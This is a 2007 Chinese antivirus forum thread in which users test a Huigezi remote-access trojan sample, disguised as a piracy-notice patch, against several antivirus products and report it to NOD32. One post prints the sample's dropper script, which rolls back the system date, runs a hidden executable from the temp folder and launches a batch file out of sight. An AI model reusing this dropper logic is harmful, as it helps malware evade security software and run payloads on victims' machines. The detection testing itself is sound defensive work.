转FF一个鸽子E1B5D1

显示全部楼层 · 发表于 2007-7-29 22:06:59

金山挂,费尔扫描挂

微点挂,而且没有拦截衍生物

显示全部楼层 · 发表于 2007-7-29 22:10:02

我刚才实机测试了下,忘了截图.红伞是过了,
不过zA防火墙还是不错的,全部拦截了.

显示全部楼层 · 发表于 2007-7-29 22:14:13

set date=%date%
date 1985-10-24
@echo off & setlocal enableextensions
echo WScript.Sleep 1000 > bksy.vbs
set /a i = 10
:Timeout
if %i% == 0 goto Next
setlocal
set /a i = %i% - 1
cscript //nologo bksy.vbs
goto Timeout
goto End
:Next
%systemroot%/temp/55.exe
date %date%
date 2007-06-12
del bksy.vbs

Set myshell = CreateObject("Wscript.Shell")
myshell.run "cmd /c s.bat",vbhide

显示全部楼层 · 发表于 2007-7-29 22:15:03

鸽子就在下面不远处

显示全部楼层 · 发表于 2007-7-29 22:21:31

原帖由 promised 于 2007-7-29 22:15 发表
鸽子就在下面不远处

where's the gray pegion?
下面是哪个下面

显示全部楼层 · 发表于 2007-7-29 22:49:23

原帖由 微点卫士 于 2007-7-29 22:21 发表

where's the gray pegion?
下面是哪个下面

你JM兄弟的。。。。

比较丰富
衍生物1.74M
http://www.duote.net/4B68B073E989588C
[ 本帖最后由野马于 2007-7-29 22:39 编辑 ]

附件
2007-7-29 22:28

4.jpg (41.45 KB)

2007-7-29 22:28

5.jpg (34.8 KB)

显示全部楼层 · 发表于 2007-7-29 23:07:32

上报nod

显示全部楼层 · 发表于 2007-7-29 23:11:25

哇哦~过了好多的杀软

显示全部楼层 · 发表于 2007-7-29 23:11:45

运行后nod32只报了那个bat.

2007-7-29 23:05:33 AMON file C:\fslrdr\1\[_B_]WINDIR[_E_]\Temp\s.bat BAT/Agent.Y trojan quarantined - deleted Event occurred on a new file created by the application: F:\去除微软盗版通知补丁[1]\去除微软盗版通知补丁.exe. The file was moved to quarantine. You may close this window.

显示全部楼层 · 发表于 2007-7-29 23:39:37

又是假的